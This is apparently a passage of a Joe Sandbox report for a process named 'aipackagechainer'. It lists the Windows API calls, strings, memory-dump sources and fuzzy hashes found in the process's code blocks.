                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                          • API String ID: 667068680-1718035505
                                          • Opcode ID: efecdda2dee50bf8d36870e30179d725da8476956f376262a922c1184da09a73
                                          • Instruction ID: c8dec98bc634897bbb5687b5388c621f3f0f2acf3bd234432c2814c51239507b
                                          • Opcode Fuzzy Hash: efecdda2dee50bf8d36870e30179d725da8476956f376262a922c1184da09a73
                                          • Instruction Fuzzy Hash: 2CF0C831205262BB1B714F64BE98FBF32CC9B01744324003DE901D6960EF61CC85F691
                                          APIs
                                          • GetDlgItem.USER32(?,0000040A), ref: 000A01A5
                                          • SetWindowTextW.USER32(00000000,?), ref: 000A01AD
                                          • GetDlgItem.USER32(?,0000040B), ref: 000A01BB
                                          • SendMessageW.USER32(00000000,00000410,00000002,00000000), ref: 000A01CD
                                          • ShowWindow.USER32(00000000,00000000), ref: 000A01DC
                                          • Sleep.KERNEL32(000000C8), ref: 000A01E3
                                          • ShowWindow.USER32(00000000,00000001), ref: 000A01EC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$ItemShow$MessageSendSleepText
                                          • String ID:
                                          • API String ID: 106862907-0
                                          • Opcode ID: ab4517cadc87f0b720d4a31c013f46f392b8058eee31e48c2b510c233012b67a
                                          • Instruction ID: 501e08c14790a826549cd67b11c06279a96ef4db1a510405d28eba87b47c2258
                                          • Opcode Fuzzy Hash: ab4517cadc87f0b720d4a31c013f46f392b8058eee31e48c2b510c233012b67a
                                          • Instruction Fuzzy Hash: 14018172640341ABF7105BA4DC8DF7A7B69EF89B11F144418F701AB2F0C7B59851DB25
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000,D11C52E5), ref: 000757F1
                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 00075906
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 0007590C
                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 0007599F
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 000759A5
                                          • CoUninitialize.OLE32 ref: 00075B28
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$FreeProcess$InitializeUninitialize
                                          • String ID:
                                          • API String ID: 4239879612-0
                                          • Opcode ID: 23a408e32d4804619052a4430d74a9ee2c5ee874506e40c2ce0394da2c5e28fe
                                          • Instruction ID: 7a50dbc81d4189134c320c5984498dc7b563ffac791c1dcbc5a8e7920b41c818
                                          • Opcode Fuzzy Hash: 23a408e32d4804619052a4430d74a9ee2c5ee874506e40c2ce0394da2c5e28fe
                                          • Instruction Fuzzy Hash: 23D15A70D00609DFDB24CF68C984BEDBBB4BF45305F24829DE449A7292DBB89A44CB55
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c4bf4fb19c3ee0b120ff787f5756cb1cb108651552611b6f8715b4703cefafd
                                          • Instruction ID: 37e42823ed6da8f751edfa3c9868f164d0197ae0bcefcac21b9486105536da7c
                                          • Opcode Fuzzy Hash: 9c4bf4fb19c3ee0b120ff787f5756cb1cb108651552611b6f8715b4703cefafd
                                          • Instruction Fuzzy Hash: 20B1C570B04289AFDB11DF9AC890BEDBBF5AF4A300F144199E505B7392C775A942CB62
                                          APIs
                                          • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,D11C52E5,?,00000004), ref: 00064768
                                          • MoveFileW.KERNEL32(?,00000000), ref: 00064B3B
                                          • DeleteFileW.KERNEL32(?), ref: 00064B85
                                          • FreeLibrary.KERNEL32(00000000), ref: 00064E1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$DeleteFreeLibraryMoveNameTemp
                                          • String ID: p1Wu
                                          • API String ID: 2027907882-3125263879
                                          • Opcode ID: 4da187f3d53a386b314964ad600f2b908727cfa485117c3683ca3d9d849063c7
                                          • Instruction ID: 166130b57b58e59988310df64161195e89e51a2f35ea4232f3389c30a23d3a0e
                                          • Opcode Fuzzy Hash: 4da187f3d53a386b314964ad600f2b908727cfa485117c3683ca3d9d849063c7
                                          • Instruction Fuzzy Hash: 93125970D112699BDB64DF28CC98BEDB7B2BF54304F1442D9E409A7291EB746B84CF90
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00068B2A
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00068B4C
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00068B74
                                          • __Getctype.LIBCPMT ref: 00068C55
                                          • std::_Facet_Register.LIBCPMT ref: 00068CB7
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00068CE1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID:
                                          • API String ID: 1102183713-0
                                          • Opcode ID: 3543b0f177b9d058cd92104ed72fd6f6c02975a4cbd204de37edb85ba365a6da
                                          • Instruction ID: 811753dc5dcc71218856e89c4d0811005b660dadd46e47386b204fa90aa9fd39
                                          • Opcode Fuzzy Hash: 3543b0f177b9d058cd92104ed72fd6f6c02975a4cbd204de37edb85ba365a6da
                                          • Instruction Fuzzy Hash: EE61BDB1D01649DFDB20CF68C940BAEBBF0EF14314F14825DD945AB392EB74AA85CB91
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0006CD0D
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0006CD2F
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0006CD57
                                          • __Getcoll.LIBCPMT ref: 0006CE21
                                          • std::_Facet_Register.LIBCPMT ref: 0006CE66
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0006CE9E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                          • String ID:
                                          • API String ID: 1184649410-0
                                          • Opcode ID: 2133f4caabc92cbf5b797837bd9b9017aefcfaebd166b3a94eb0e433f12ceab4
                                          • Instruction ID: ac271403310a828c18bac117a37a46fe417257b298c68abd79c70dc29ee29a4a
                                          • Opcode Fuzzy Hash: 2133f4caabc92cbf5b797837bd9b9017aefcfaebd166b3a94eb0e433f12ceab4
                                          • Instruction Fuzzy Hash: 9551ACB0D05248EFDB11DF98D880BEDBBB1FF44324F148059E819AB392DB74AA45CB91
                                          APIs
                                          • CharNextW.USER32(?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?,?), ref: 0007FCFB
                                          • CharNextW.USER32(00000001,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD1B
                                          • CharNextW.USER32(00000000,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD2B
                                          • CharNextW.USER32(00000027,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD34
                                          • CharNextW.USER32(?,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FDA0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CharNext
                                          • String ID:
                                          • API String ID: 3213498283-0
                                          • Opcode ID: 18894e34e0c5c4d14f327a62ddb90e66524eabac30ee0ed8be653cd46bb70e94
                                          • Instruction ID: 297b6b37f7888068e66549d03d700a707dbb1a5d8e8e496a85fc87a0179e3f4f
                                          • Opcode Fuzzy Hash: 18894e34e0c5c4d14f327a62ddb90e66524eabac30ee0ed8be653cd46bb70e94
                                          • Instruction Fuzzy Hash: D0410636A002068FC7209F29DC485BAB3E7FFC8311B45C93AE5488B265E7389D41CB54
                                          APIs
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A42E2
                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,?,00000001,?), ref: 000A45A4
                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000010,00000000), ref: 000A461E
                                          • RegCloseKey.ADVAPI32(00000000), ref: 000A46DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: QueryValue$Close_wcsrchr
                                          • String ID: hu
                                          • API String ID: 3512256112-423011080
                                          • Opcode ID: d4fee3c76ca9a1ff00893419f891264fba6b46e4c536350cc5bc89a5136084a0
                                          • Instruction ID: 31fc4e844d5c5725cdd0d106451f07c45134d9b11db92f75cc26975a2a1d6aa9
                                          • Opcode Fuzzy Hash: d4fee3c76ca9a1ff00893419f891264fba6b46e4c536350cc5bc89a5136084a0
                                          • Instruction Fuzzy Hash: 96E17E75901619ABDB20DFA8CC88BD9B7F4EF49320F1482D9E419A7291DBB49E84CF50
                                          APIs
                                          • GetDlgItem.USER32(?,00000425), ref: 000AFC15
                                          • GetWindowTextLengthW.USER32(00000000), ref: 000AFC20
                                          • GetWindowTextW.USER32(?,?,?), ref: 000AFC71
                                          • MessageBeep.USER32(000000FF), ref: 000AFCBD
                                          • GetDlgItem.USER32(?,00000425), ref: 000AFCD2
                                          • SetFocus.USER32(00000000,?,?), ref: 000AFCD9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ItemTextWindow$BeepFocusLengthMessage
                                          • String ID:
                                          • API String ID: 2221317226-0
                                          • Opcode ID: 77bc57abd74304204f09531ad53b0d94533f077a1cf79f66619ac870191d6470
                                          • Instruction ID: eebaba92dbb0949c2823dd85bb8f6a313a8a3d9bf7928ec0fe020d7151c463d1
                                          • Opcode Fuzzy Hash: 77bc57abd74304204f09531ad53b0d94533f077a1cf79f66619ac870191d6470
                                          • Instruction Fuzzy Hash: 5431AD71600606DFDB04DFA9D98D96ABBE6FF88325F10413CF885C7261DB36A904CB91
                                          APIs
                                          • GetActiveWindow.USER32 ref: 000A8CFB
                                          • SetLastError.KERNEL32(0000000E), ref: 000A8D18
                                          • GetCurrentThreadId.KERNEL32 ref: 000A8D47
                                          • EnterCriticalSection.KERNEL32(0012BCD4), ref: 000A8D67
                                          • LeaveCriticalSection.KERNEL32(0012BCD4), ref: 000A8D8B
                                          • DialogBoxParamW.USER32(000000D8,00000000,Function_00038810,00000000), ref: 000A8DA8
                                            • Part of subcall function 000CA3DA: GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
                                            • Part of subcall function 000CA3DA: HeapAlloc.KERNEL32(00000000), ref: 000CA3E6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalHeapSection$ActiveAllocCurrentDialogEnterErrorLastLeaveParamProcessThreadWindow
                                          • String ID:
                                          • API String ID: 828238446-0
                                          • Opcode ID: 88cdd4f0121399c43562e21ea4505b57f6b1abd8427e8ee70a4026e76f057761
                                          • Instruction ID: 3fef8e01e88934be855311f9d3537d8e63dac2f5874a47524023f12c15789cae
                                          • Opcode Fuzzy Hash: 88cdd4f0121399c43562e21ea4505b57f6b1abd8427e8ee70a4026e76f057761
                                          • Instruction Fuzzy Hash: 72310275A04349AFD710CFA8DC48B59BBF4FB04715F10861AEA14A7AD0DBB56810CB52
                                          APIs
                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,80000000), ref: 000A92B1
                                          • VerSetConditionMask.KERNEL32(00000000), ref: 000A92B5
                                          • VerSetConditionMask.KERNEL32(00000000), ref: 000A92B9
                                          • VerifyVersionInfoW.KERNEL32(?), ref: 000A92DE
                                          • GetParent.USER32(000A881E), ref: 000A92FB
                                          • SendMessageW.USER32(?,00000432,00000000,?), ref: 000A9338
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ConditionMask$InfoMessageParentSendVerifyVersion
                                          • String ID:
                                          • API String ID: 2374517313-0
                                          • Opcode ID: cbce5fadf9e814ea9e1f37881191d7d9f66c031453e5f4843f4dc721a714b93a
                                          • Instruction ID: a4767933878efb2e9702015a2b9d6ce892052a922d6fcf963cecc39aca257a16
                                          • Opcode Fuzzy Hash: cbce5fadf9e814ea9e1f37881191d7d9f66c031453e5f4843f4dc721a714b93a
                                          • Instruction Fuzzy Hash: AE312FB1518384AFE360CF24DC49B6BBBE8EBC8704F40491EF58497290D7B59944CB96
                                          APIs
                                          • GetLastError.KERNEL32(?,?,000CE417,0008ABBC,0010C440,00000002,D11C52E5), ref: 000CE42E
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000CE43C
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000CE455
                                          • SetLastError.KERNEL32(00000000,?,000CE417,0008ABBC,0010C440,00000002,D11C52E5), ref: 000CE4A7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 928cf93e4951bf1fee85bc9d014e9f33d159b169efdbd630617129a66ef715a6
                                          • Instruction ID: 370b208acf63f722bdd3b478aedc740020e046411177128afe02141048f09826
                                          • Opcode Fuzzy Hash: 928cf93e4951bf1fee85bc9d014e9f33d159b169efdbd630617129a66ef715a6
                                          • Instruction Fuzzy Hash: 4101D43260C3517FE7782778EC85FAF2B88EB02775720036EF510A55E2EF254C56A154
                                          APIs
                                          • ResetEvent.KERNEL32(?,?,?,000C92C1), ref: 000C7BD2
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,000C92C1), ref: 000C7BE2
                                          • GetLastError.KERNEL32 ref: 000C7BEF
                                          • ResetEvent.KERNEL32(?), ref: 000C7C07
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C7C17
                                          • GetLastError.KERNEL32 ref: 000C7C24
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Event$CreateErrorLastReset
                                          • String ID:
                                          • API String ID: 3053278375-0
                                          • Opcode ID: a6ad062d1e21610cb578f2cb0efc44a56640110115df3873d6caaa14ede30a8b
                                          • Instruction ID: 7b9d43349f603d968fddef16b6b430f6111b645b10c49b6ddac03463fa2a9f89
                                          • Opcode Fuzzy Hash: a6ad062d1e21610cb578f2cb0efc44a56640110115df3873d6caaa14ede30a8b
                                          • Instruction Fuzzy Hash: A5014F303083439FFBA45B39AC15F6E72D8AB44B01F14082DE90AD65E0FB94EC419E54
                                          APIs
                                          • SetEvent.KERNEL32(00000002,?,?,000C36BF,D11C52E5), ref: 000C93E6
                                          • GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C93F0
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C36BF,D11C52E5), ref: 000C93FC
                                          • GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C9407
                                          • CloseHandle.KERNEL32(?,?,?,000C36BF,D11C52E5), ref: 000C9411
                                          • GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C941B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CloseEventHandleObjectSingleWait
                                          • String ID:
                                          • API String ID: 891035169-0
                                          • Opcode ID: f8313d1693d491df0852cf54f60fcc7489c4d1f8146e687379c00622405680a5
                                          • Instruction ID: 2831b51bd79bfed08a9ccaeff72f253a3c28f51a7c3e8005bb6b7af215b226c7
                                          • Opcode Fuzzy Hash: f8313d1693d491df0852cf54f60fcc7489c4d1f8146e687379c00622405680a5
                                          • Instruction Fuzzy Hash: 7AF030306007518BEA645B7AEC4CF6A77DCBF90735B058A2DE561C36A0DBB4EC46CA21
                                          APIs
                                          • PathIsUNCW.SHLWAPI(?,D11C52E5,?,?,?,?,?,?,?,?,?,?,?,00000000,000F242F,000000FF), ref: 000851BB
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,0010C404,00000001,?,?,D11C52E5), ref: 0008527A
                                          • GetLastError.KERNEL32(?,D11C52E5), ref: 00085288
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLastPath
                                          • String ID: \\?\$\\?\UNC\
                                          • API String ID: 953296794-3019864461
                                          • Opcode ID: c099dcd93de70200768cdf31cce0d99cfcc736a30ffae2557e990a130b31f99b
                                          • Instruction ID: ac10c5190e2d508cb96859c8c49a6a31808f35e65cdae3c3cc5babd24cb0745d
                                          • Opcode Fuzzy Hash: c099dcd93de70200768cdf31cce0d99cfcc736a30ffae2557e990a130b31f99b
                                          • Instruction Fuzzy Hash: B861A171D006099FDB14EFA8C885BEDBBF5FF15321F244269E451A72D2DB749A04CB50
                                          APIs
                                          • InitializeCriticalSection.KERNEL32(?,D11C52E5), ref: 000883EC
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          • EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000883F9
                                          • OutputDebugStringW.KERNEL32(?,?,00000000), ref: 000884A5
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000F2D3D,000000FF), ref: 00088547
                                          Strings
                                          • Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 0008842F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
                                          • String ID: Logger::SetLogFile( %s ) while OLD path is:%s
                                          • API String ID: 117955849-1927537607
                                          • Opcode ID: 4ea8e502b8166f02010110854e41a41bd20c819e89c77e4a10c3ca6723212033
                                          • Instruction ID: 3b1712e8757e679a5b4ae73beb70301717696a146f5f21531378c9f1d8d11e85
                                          • Opcode Fuzzy Hash: 4ea8e502b8166f02010110854e41a41bd20c819e89c77e4a10c3ca6723212033
                                          • Instruction Fuzzy Hash: 03510531900646DFDB10EF64C905BBEBBB5FF15314F948659E941AB2A2EB319E01CB90
                                          APIs
                                          • DeleteFileW.KERNEL32(?,D11C52E5), ref: 00093BFD
                                          • GetLastError.KERNEL32 ref: 00093C05
                                          • RemoveDirectoryW.KERNEL32(?,D11C52E5), ref: 00093C6D
                                          • GetLastError.KERNEL32 ref: 00093C75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
